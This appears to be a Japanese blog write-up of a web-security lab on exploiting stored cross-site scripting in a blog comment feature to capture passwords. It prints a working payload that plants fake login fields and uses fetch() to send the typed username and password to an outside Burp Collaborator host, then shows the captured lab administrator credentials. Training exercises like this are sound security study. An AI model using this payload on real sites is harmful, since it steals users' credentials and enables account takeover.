shikata ga nai

Private? There is no such things.

Exploiting cross-site scripting to capture passwordsをやってみた

Hello there, ('ω')ノ

 

クロスサイトスクリプティングを活用してパスワードを取得を。

このラボでは、ブログのコメント機能に脆弱性があって。

この脆弱性を悪用して被害者のユーザ名とパスワードを盗んで。

被害者のアカウントにログインするとのことで。

まずは、脆弱性の確認を。

 

f:id:ThisIsOne:20210326181150p:plain

 

一方、コラボレータのペイロードをコピーしておいて。

 

f:id:ThisIsOne:20210326181314p:plain

 

脆弱性の存在が確認できたので、下記のスクリプトを投稿することに。

このスクリプトは、コメントを表示する際にPOSTリクエストを発行して。

その中には、ユーザ名とパスワードが含まれていて。


<input name=username id=username>
<input type=password name=password onchange="if(this.value.length)fetch('https://4glfpr1femd0nyamebn452y1ys4js8.burpcollaborator.net',{
 method:'POST',
 mode: 'no-cors',
 body:username.value+':'+this.value
});">

 

f:id:ThisIsOne:20210326181421p:plain

 

POSTのリクエストボディに被害者のユーザ名とパスワードがあって。

 

 administrator:2q5b0ww193d317gpgyaf

 

f:id:ThisIsOne:20210326181520p:plain

 

コラボレータから取得したIDとパスワードでログインすると。

 

f:id:ThisIsOne:20210326181557p:plain

 

クリアできた。

 

f:id:ThisIsOne:20210326181623p:plain

 

Best regards, (^^ゞ

ひとりひとりの自覚をもった行動で、医療従事者と保健所職員を助けよう。

f:id:ThisIsOne:20200404115457p:plain